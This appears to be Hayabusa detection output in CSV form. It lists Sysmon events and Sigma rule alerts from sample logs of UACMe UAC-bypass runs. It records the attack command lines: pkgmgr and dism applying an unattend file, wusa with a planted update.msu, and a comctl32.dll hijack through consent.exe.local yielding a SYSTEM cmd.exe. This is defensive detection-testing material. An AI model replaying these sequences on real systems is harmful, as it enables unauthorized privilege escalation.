Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 747F3D96-78DF-5D45-0000-0010BD350401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 747F3D96-78DF-5D45-0000-0010EF400401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 747F3D96-792F-5D45-0000-00103DA80601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 747F3D96-7930-5D45-0000-001027DC0601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:19.888 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 747F3D96-7935-5D45-0000-001066CA0701,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.524 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 747F3D96-7937-5D45-0000-00100D290801,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:25.165 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 6576 | PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:31:27.683 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx 2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 747F3D96-7EE2-5D45-0000-0010F19E2801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:38.640 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 747F3D96-7EF1-5D45-0000-0010DDBF2901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 21:32:49.525 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx 2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: 